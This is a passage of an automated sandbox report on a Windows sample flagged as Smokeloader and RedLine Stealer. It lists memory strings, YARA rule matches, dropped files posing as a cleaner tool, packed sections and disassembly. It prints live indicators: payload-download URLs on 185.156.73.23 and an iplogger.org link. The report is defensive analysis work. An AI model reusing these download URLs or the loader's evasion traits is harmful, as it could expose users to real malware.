Source: dI3n4LSHB7.exe, 00000000.00000003.1850067777.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875573218.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901535683.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1824890347.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029367883.0000000005467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download23/add?substr=mixtwo&s=three&sub=emp
Source: dI3n4LSHB7.exe, 00000000.00000003.1850067777.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875573218.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901535683.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download23/files/download
Source: dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download23/files/downloadft
Source: dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download23/files/downloadwo&s=three&sub=emp
Source: dI3n4LSHB7.exe, 00000000.00000003.2004022772.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875426608.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927026638.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978855057.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953566017.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1849981502.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901433498.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2089976231.000000000594E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download6
Source: dI3n4LSHB7.exe, 00000000.00000002.2421379275.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download=%
Source: dI3n4LSHB7.exe, 00000000.00000003.2004022772.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927026638.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978855057.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953566017.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2089976231.000000000594E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadF
Source: dI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875573218.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901535683.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029367883.0000000005467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadLMEM
Source: dI3n4LSHB7.exe, 00000000.00000003.2004022772.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978855057.000000000594C000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadX
Source: dI3n4LSHB7.exe, 00000000.00000003.2164899084.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143225056.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2089976231.000000000594E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadd
Source: dI3n4LSHB7.exe, 00000000.00000003.1850067777.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1875573218.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1901535683.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029367883.0000000005467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadft
Source: dI3n4LSHB7.exe, 00000000.00000003.2029283318.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054460287.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2089976231.000000000594E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadj
Source: dI3n4LSHB7.exe, 00000000.00000003.1927437039.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2090076872.0000000005467000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2029367883.0000000005467000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadwo&s=three&sub=emp
Source: dI3n4LSHB7.exe, 00000000.00000002.2421379275.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143225056.000000000594E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download
Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
Source: dI3n4LSHB7.exe, 00000000.00000003.2143147652.0000000005529000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143116370.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144119013.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000590F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144925327.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2145027376.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2146009236.000000000594F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: dI3n4LSHB7.exe, 00000000.00000003.2143147652.0000000005529000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143116370.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144119013.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000590F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144925327.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2145027376.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2146009236.000000000594F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: dI3n4LSHB7.exe, 00000000.00000003.2143147652.0000000005529000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000594E000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143116370.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144119013.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2143782399.000000000590F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2144925327.0000000005A21000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2145027376.000000000594F000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2146009236.000000000594F000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Source: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2421354084.0000000000D79000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: dI3n4LSHB7.exeStatic PE information: section name:
Source: dI3n4LSHB7.exeStatic PE information: section name: .idata
Source: dI3n4LSHB7.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04CF9D600_3_04CF9D60
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04CFC7DD0_3_04CFC7DD
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04D097F20_3_04D097F2
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04D037F90_3_04D037F9
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04CFE7200_3_04CFE720
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04D030E60_3_04D030E6
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04CF20700_3_04CF2070
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04D099120_3_04D09912
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04CFCA0F0_3_04CFCA0F
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00402C700_2_00402C70
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0040A9600_2_0040A960
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0040F3200_2_0040F320
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0040D3DD0_2_0040D3DD
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0041A3F20_2_0041A3F2
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_004143F90_2_004143F9
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00413CE60_2_00413CE6
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0041A5120_2_0041A512
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0040D60F0_2_0040D60F
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C90_2_009960C9
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00988C5D0_2_00988C5D
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_008FF98A0_2_008FF98A
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_008941920_2_00894192
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009545FB0_2_009545FB
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0096D9350_2_0096D935
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0086A2C60_2_0086A2C6
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_008BCEFA0_2_008BCEFA
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0089E2FE0_2_0089E2FE
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0098F63A0_2_0098F63A
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00991E280_2_00991E28
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00992BBA0_2_00992BBA
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0098DB190_2_0098DB19
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0098A7150_2_0098A715
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0081CB1A0_2_0081CB1A
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00997B210_2_00997B21
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00AAC8D90_2_00AAC8D9
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00AAEE490_2_00AAEE49
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B4F5870_2_04B4F587
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B5A6590_2_04B5A659
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B4D6440_2_04B4D644
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B5A7790_2_04B5A779
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B53F4D0_2_04B53F4D
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B4D8760_2_04B4D876
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B4ABC70_2_04B4ABC7
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_04B43B270_2_04B43B27
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: String function: 04CF8FA0 appears 34 times
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: String function: 04B49E07 appears 34 times
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: String function: 10003160 appears 32 times
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: String function: 00409BA0 appears 35 times
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 480
Source: dI3n4LSHB7.exe, 00000000.00000003.2164532643.00000000058B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs dI3n4LSHB7.exe
Source: dI3n4LSHB7.exe, 00000000.00000003.2164899084.00000000058D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs dI3n4LSHB7.exe
Source: dI3n4LSHB7.exe, 00000000.00000003.2164646451.0000000006112000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs dI3n4LSHB7.exe
Source: dI3n4LSHB7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2421354084.0000000000D79000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dI3n4LSHB7.exeStatic PE information: Section: ghfuhyhn ZLIB complexity 0.9900847496345029
Source: classification engineClassification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00D7A3BE CreateToolhelp32Snapshot,Module32First,0_2_00D7A3BE
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6780
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile created: C:\Users\user\AppData\Local\Temp\eEwf3ZG9fBWYD5wJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCommand line argument: emp0_2_00408020
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCommand line argument: mixtwo0_2_00408020
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: dI3n4LSHB7.exeVirustotal: Detection: 57%
Source: dI3n4LSHB7.exeReversingLabs: Detection: 63%
Source: dI3n4LSHB7.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\dI3n4LSHB7.exe "C:\Users\user\Desktop\dI3n4LSHB7.exe"
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 480
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\eEwf3ZG9fBWYD5w\Y-Cleaner.exe
Source: dI3n4LSHB7.exeStatic file information: File size 1945600 > 1048576
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: dI3n4LSHB7.exeStatic PE information: Raw size of ghfuhyhn is bigger than: 0x100000 < 0x1ab800

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeUnpacked PE file: 0.2.dI3n4LSHB7.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ghfuhyhn:EW;ddcmvylx:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dI3n4LSHB7.exeStatic PE information: real checksum: 0x1e220e should be: 0x1dec7c
Source: dll[1].0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: dI3n4LSHB7.exeStatic PE information: section name:
Source: dI3n4LSHB7.exeStatic PE information: section name: .idata
Source: dI3n4LSHB7.exeStatic PE information: section name:
Source: dI3n4LSHB7.exeStatic PE information: section name: ghfuhyhn
Source: dI3n4LSHB7.exeStatic PE information: section name: ddcmvylx
Source: dI3n4LSHB7.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_3_04D0E2B5 push esi; ret 0_3_04D0E2BE
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0041FAB5 push esi; ret 0_2_0041FABE
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push eax; mov dword ptr [esp], edx0_2_009960D1
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push ebx; mov dword ptr [esp], edx0_2_009960EB
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push ecx; mov dword ptr [esp], esi0_2_0099612C
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 4F7423A2h; mov dword ptr [esp], edx0_2_00996180
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 1417B080h; mov dword ptr [esp], edi0_2_009961F3
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push ebp; mov dword ptr [esp], ecx0_2_0099623F
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 7B193AF3h; mov dword ptr [esp], edx0_2_0099626E
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push 7D0A78D4h; mov dword ptr [esp], eax0_2_00996276
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_009960C9 push edi; mov dword ptr [esp], 3EF27CF6h0_2_0099627F
